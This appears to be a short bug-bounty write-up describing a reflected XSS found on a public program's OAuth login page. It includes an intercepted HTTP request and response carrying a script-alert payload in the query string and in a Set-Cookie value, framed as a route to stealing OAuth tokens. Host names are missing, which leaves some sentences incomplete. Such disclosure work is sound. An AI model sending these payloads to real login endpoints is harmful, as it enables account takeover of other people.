Reflected XSS on a Public Program

Hi all, My name is Naveen J AKA thevillagehacker and this is my very first write-up and I thought I should contribute some resources to the community.


I always wanted to be a very good hunter so I decided to start with low-hanging fruits and I chose to find some XSS on any of the Public Program on HackerOne.

Technical Analysis

I intercepted the login request from and sent it to the repeater and observed the way the Oauth works. The uses as an Oauth service when you click login it will redirect you to and will let you log in if you have a legitimate account. So I decided to check for Reflected XSS or any Open redirect issues to grab the Oauth token to take Over the user's account.

&Set-Cookie: <script>alert(“Hacked By Deathstroke”)</script> <script>alert("Hacked By Deathstroke")</script>


GET /oauth2/login/? <script>alert("Hacked By Deathstroke")</script> HTTP/1.1 Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close


<script>alert("Hacked By Deathstroke")</script> HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 
X-Frame-Options: SAMEORIGIN
Content-Length: 3982
Vary: Origin

Proof Of Concept

Security Researcher | Security Engineer | Security Nerd…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store